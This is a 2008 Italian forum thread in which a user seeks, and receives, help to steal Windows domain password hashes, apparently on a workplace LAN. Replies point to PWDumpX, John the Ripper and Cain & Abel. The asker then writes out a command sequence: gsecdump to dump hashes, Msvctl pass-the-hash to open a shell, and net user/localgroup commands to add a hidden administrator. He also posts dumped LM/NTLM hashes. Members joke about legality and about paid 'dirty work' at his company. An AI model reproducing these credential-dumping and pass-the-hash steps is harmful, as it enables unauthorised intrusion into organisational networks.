Punto informatico Network
Login Esegui login | Non sei registrato? Iscriviti ora (è gratuito!)
Username: Password:
  • Annuncio Pubblicitario

hash password dominio

Problemi con i sistemi operativi di casa Microsoft? Questa è la sezione che fa per te!

hash password dominio

Messaggioda microinfo » lun set 15, 2008 2:13 pm

Salve è da tempo che seguo questa sito mi è smp piaciuto e ho imparato molte cosette visto che ho notato che siete molto preparati sul sistema windows avrei un quesito da porvi. Grazie alle mie conoscenze e anche da come ho visto nelle voste guide resettare o trovare una password in windows è molto semplice ma io avrei un'altra cosa da chiedervi...se mi trovo in una rete lan e accedo sotto dominio dove posso prendere l'hash delle password ? come posso trovare l'hash dei computer e soprattutto dell'amministratore del dominio?il file sam non penso stia sul mio pc in locale ho sentito parlare di un programma chiamato cachedump lo consocete è in inglese ma a me non funziona.questo è il mio problema e lo espondo a voi che siete piu esperti sono anni che cerco un sistema per capire grazie ! [;)]
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm

Re: hash password dominio

Messaggioda kap » lun set 15, 2008 2:30 pm

Innanzitutto benvenuto nel MegaForum!!! [^]

Hai già provato seguendo queste indicazioni?

P.s: ogni volta che leggo "John the ripper" mi si illuminano gli occhi..eheh...questo lavoro lo facevo sotto debian.. [rolleyes] ...bei tempi [std]
In bocca al lupo per tutto ragazzi
Avatar utente
kap
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2876
Iscritto il: lun ott 09, 2006 11:10 am
Località: car el me car milan

Re: hash password dominio

Messaggioda microinfo » lun set 15, 2008 2:43 pm

si da quello che ho capito windows memorizza una copia della password nella cache del del pc in locale in modo da accedere anche non in linea l'hash è in formato MSCASH. per decifrarlo devo usare jhon the ripper. solo che 1 devo scaricare cachedump dal p2p visto che i link sono morti www.cr0.net poi lo faccio partire e mi dovrebbe dare tutti gli hash memorizzati smp che il pc abbia attivato la memorizzazione nella cache di password..
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm


Re: hash password dominio

Messaggioda kap » lun set 15, 2008 3:02 pm

Lascia perdere cachedump che da quanto letto è piuttosto vecchiotto...prova con PWDumpX v1.1
Codice: Seleziona tutto
Description:

PWDumpX version 1.1 allows a user with administrative privileges to retrieve the domain password cache, password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.

If an input list of remote systems is supplied, PWDumpX will attempt to obtain the domain password cache, the password hashes and the LSA secrets from each remote Windows system in a multi-threaded fashion (up to 64 systems simultaneously).

The domain password cache, password hashes and LSA secrets from remote Windows systems are encrypted as they are transfered over the network. No data is sent over the network in clear text.

This tool is a completely re-written version of CacheDump, PWDump3e and LSADump2 which integrates suggestions/bug fixes for PWDump3e and LSADump2 found on various web sites, etc.

Source code included.

Credits:

My intent with including the source code along with this tool is to give something back to the I.T. security community. I learned a lot while creating PWDumpX but I could not have done it without the original source code for CacheDump, PWDump2, PWDump3e, and LSADump2.
So...thanks to the creators of these tools for being generous enough to include the source code with these tools so that hungry minds can learn new things.

fonte

Pagina del coder

download
In bocca al lupo per tutto ragazzi
Avatar utente
kap
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2876
Iscritto il: lun ott 09, 2006 11:10 am
Località: car el me car milan

Re: hash password dominio

Messaggioda microinfo » lun set 15, 2008 8:25 pm

6 stato genitilissimo ho avviato il programma e da quello che ho capito ho messo ip del mio pc in lan e poi ho fatto + +. PWDumpX.exe 192.168.1.2 + + e quindi mi ha creato 2 file txt(LSA secret,PW hashes) solo che c'è scritto un casino di robba quali devo usare e che programma mi consigli?
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm

Re: hash password dominio

Messaggioda kap » mar set 16, 2008 11:01 am

Stiamo scrivendo post sul filo della legalità....ih ih

ma tanto sappiamo sia io che te che queste informazioni ti servono solo per curiosità [sh]

..come ben sai in rete non trovi istruzioni pronte all'uso sull'utilizzo di certi programmi (non vorrei mettermi a provare il programma in questione visto che sto preparando un esame) altrimenti tutti i muccetti starebbero a tentare di sniffare pacchetti e a provare a catturare chiavi pgp...
Ho trovato però una simpatica guida che descrive in maniera abbastanza accurata quello che serve a te [std]


saluti [;)]
In bocca al lupo per tutto ragazzi
Avatar utente
kap
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2876
Iscritto il: lun ott 09, 2006 11:10 am
Località: car el me car milan

Re: hash password dominio

Messaggioda microinfo » mar set 16, 2008 6:19 pm

ciao ottima la guida spiega davvero molte debolezze dei sistemi windows, peccato che molto materiale utile a questo mondo sia tutto in inglese [V] da quello che ho potuto capire e che basta che possiedi l'accesso administrator locale e non in dominio, poi si estraggono gli hash e si possono usare per aprire una shell cmd nel pc admistrator del dominio assurdo sembra impossibile wow. ha casa ho una minirete di pc sto provando quanto descritto sono molto curioso non lo so a volte mi vengono ste pazzie voglia di scoprire ciò che pochi conoscono.Visto che però mastico poco l'inglese mi potresti abbreviare un po la guida ci sono tanti comandi poco compransibili helpme comunque grazie davvero 6 molto esperto una persona csi è rara trovarla credimi [^]
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm

Re: hash password dominio

Messaggioda clic » mar set 16, 2008 6:55 pm

microinfo ha scritto: mi potresti abbreviare un po la guida ci sono tanti comandi poco compransibili helpme [^]


sono certo che se lo paghi bene, kap potrebbe venire direttamente in azienda a fare il lavoretto sporco al tuo posto [rotolo]
intendiamoci, se il prezzo è buono anche io sarei disponibile [fischio]

agli admin, sarebbe carino un tag che avvisa quando si è in modalità ca++eggio [:D]
Avatar utente
clic
Bronze Member
Bronze Member
 
Messaggi: 931
Iscritto il: lun mar 17, 2008 9:03 pm

Re: hash password dominio

Messaggioda kap » mar set 16, 2008 7:16 pm

microinfo ha scritto: mi potresti abbreviare un po la guida ci sono tanti comandi poco compransibili helpme [^]
Appena termino di preparare un esame che ho in ballo vedo cosa riesco a fare (guarda caso l'esame è proprio sulla sicurezza informatica! [:D] [:D] [:D] )

clic ha scritto:sono certo che se lo paghi bene, kap potrebbe venire direttamente in azienda a fare il lavoretto sporco al tuo posto [rotolo]
Non ci scherzerei più di tanto...ih ih ih [sh] [sh] [sh]
clic ha scritto:intendiamoci, se il prezzo è buono anche io sarei disponibile [fischio]
Che fai? mi togli il pane di bocca? [:D]

clic ha scritto:agli admin, sarebbe carino un tag che avvisa quando si è in modalità ca++eggio [:D]
[?]
In bocca al lupo per tutto ragazzi
Avatar utente
kap
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2876
Iscritto il: lun ott 09, 2006 11:10 am
Località: car el me car milan

Re: hash password dominio

Messaggioda clic » mar set 16, 2008 7:25 pm

kap ha scritto:
microinfo ha scritto:
clic ha scritto:agli admin, sarebbe carino un tag che avvisa quando si è in modalità ca++eggio [:D]
[?]


a volte si scherza e per qualcuno potrebbe non essere evidente, ma con un tag apposito [ca++eggio][/ca++eggio] il problema sarebbe risolto [:)]

comunque sul tag non dico sul serio [:D]

chiedo venia per il clamoroso OT specie nei confronti di chi ha aperto il topic [std]
Avatar utente
clic
Bronze Member
Bronze Member
 
Messaggi: 931
Iscritto il: lun mar 17, 2008 9:03 pm

Re: hash password dominio

Messaggioda kap » mar set 16, 2008 7:44 pm

ahnnnnnnnnn! in quel senso!

scusami ma lo studio mi sta rendendo più scemo di quanto già non lo sia... [acc2] [acc2]

Se inserissero il tag [ca**eggio] io lo dovrei usare perennemente quindi non mi pare il caso [fischio] [fischio]


[;)]
In bocca al lupo per tutto ragazzi
Avatar utente
kap
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2876
Iscritto il: lun ott 09, 2006 11:10 am
Località: car el me car milan

Re: hash password dominio

Messaggioda microinfo » mar set 16, 2008 7:47 pm

vabn okokok lasciamo stare..comunque nte ho posto il mio problema e kap è stato (l'unico) molto disponibile che mi ha kiarito le idee mi sono state molto utili le sue info tt qui. [;)]
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm

Re: hash password dominio

Messaggioda kap » mar set 16, 2008 7:53 pm

microinfo ha scritto:vabn okokok lasciamo stare..comunque nte ho posto il mio problema e kap è stato (l'unico) molto disponibile che mi ha kiarito le idee mi sono state molto utili le sue info tt qui. [;)]

Ci mancherebbe! se posso essere utile ben venga!
Comunque controlla questo thread ogni tanto perché tra qualche giorno inserirò il post che tanto ti fa gola [;)]

P.s: evita l'utilizzo di tutte quelle brutte abbreviazioni tipo nte, che, tt..ecc..ecc.... la lettura da parte mia e di tutta l'utenza è molto più scorrevole se vengono usate le parole per intere [;)] ...in fondo l'italiano è una così bella lingua!!!!! [std]


saluti!
In bocca al lupo per tutto ragazzi
Avatar utente
kap
Membro Ufficiale (Gold)
Membro Ufficiale (Gold)
 
Messaggi: 2876
Iscritto il: lun ott 09, 2006 11:10 am
Località: car el me car milan

Re: hash password dominio

Messaggioda microinfo » mer set 17, 2008 12:46 pm

okok quando 6 disponibile mi riaiuti intanto io cerco di studiare il sistema ciaoo [;)]
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm

Re: hash password dominio

Messaggioda Matilda12 » dom set 21, 2008 6:26 pm

Salve a tutti,
mi accodo solo per aggiungere qualche piccola informazione/curiosità.

Per poter far masticare a John The Ripper un hash del tipo Ms-Cache, bisogna prendere una versione con patch del software. Tale pezza si chiama "jumbo patch build for Win32" e si può trovare QUI.
Curiosità: per far lavorare John The Ripper con l'algoritmo Ms-Cache bisogna utilizzare il comando "--format=mscash" e non "mscache" ... stranezze, eh?

Due ulteriori aspetti:
1) John The Ripper è particolarmente veloce per gli attacchi a dizionario (un ottimo dizionario può essere reperito QUI);
2) John The Ripper offre una modalità, definita "Incremental", che "può provare tutte le combinazioni di caratteri"; purtroppo è limitata a 8 caratteri; in questo caso è meglio Cain & Abel che, pur essendo (decisamente) più lento, non ha tali limiti.


Raccomandazione: assunto che ognuno è libero di fare ciò che vuole, purché poi sia disposto ad assumersi (nel bene e nel male) tutte le responsabilità delle proprie azioni, mi permetto di suggerire di impiegare queste informazioni non per lanciare "l'attacco al castello" del sistema, piuttosto per capire come funzionano le cose e verificare la validità della propria password.

[ciao]
Matilda12

P.S.
Quanto sopra è vero fino a querela di falso ... ovvio! [:D]
Dove c'è molta luce l'ombra è più nera.
Avatar utente
Matilda12
Utente inattivo
 
Messaggi: 1319
Iscritto il: mer feb 07, 2007 11:15 pm
Località: Marche - Italia

Re: hash password dominio

Messaggioda microinfo » lun set 22, 2008 2:33 pm

allora ecco quello che ho capito in modo semplice:
1 Entro in un pc con accesso administartor in locale.
2 Avvio gsecdump.exe sperando che tra gli ultimi accessi ci sia quello dell'admin del dominio. allora da cmd faccio:
gsecdump.exe -u
3 Invece di crakkare l'hash uso il tool Msvctl usando cmd e faccio:
Msvctl.exe (domain)\(user)::(lm hash):(ntlm hash)::: run cmd
4 Aggiungo un utente sempre da cmd e faccio:
Net use \\(n_macchina)
Net user (user) (password) /add
Net localgroup administrators (user) /add
Net localgroup administrators
###########################################
mo provo con queste istruzioni e vi faccio sapere...
Ultima modifica di microinfo il dom set 28, 2008 4:27 pm, modificato 2 volte in totale.
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm

Re: hash password dominio

Messaggioda microinfo » gio set 25, 2008 4:16 pm

gsecdump.exe -u ho questi hash in uscita..

PC-1DOMINIO\Administrator::f0d412bd764ffe81aad3b435b51404ee:209c6174da490caeb422f
3fa5a7ae634:::
DOMINIO\PC-1DOMINIO$::00000000000000000000000000000000:78ffaadb7bbd5fd4f81083ae38e8c6
f0:::
DOMINIO\PC-1DOMINIO$::00000000000000000000000000000000:78ffaadb7bbd5fd4f81083ae38e8c6
f0:::

perché la password è 0000000000000?
xso comunque che non c'è l'hash dell'amministratore del dominio..
il primo sono io che accedo come admin locale il secondo e il terzo io che accedo come limitato... [V]
Avatar utente
microinfo
Neo Iscritto
Neo Iscritto
 
Messaggi: 23
Iscritto il: lun set 15, 2008 12:49 pm


Torna a Sistema Operativo

Chi c’è in linea

Visitano il forum: Nessuno e 2 ospiti

cron
Powered by phpBB © 2002, 2005, 2007, 2008 phpBB Group
Traduzione Italiana phpBB.it

megalab.it: testata telematica quotidiana registrata al Tribunale di Cosenza n. 22/09 del 13.08.2009, editore Master New Media S.r.l.; © Copyright 2008 Master New Media S.r.l. a socio unico - P.I. 02947530784. GRUPPO EDIZIONI MASTER Spa Tutti i diritti sono riservati. Per la pubblicità: Master Advertising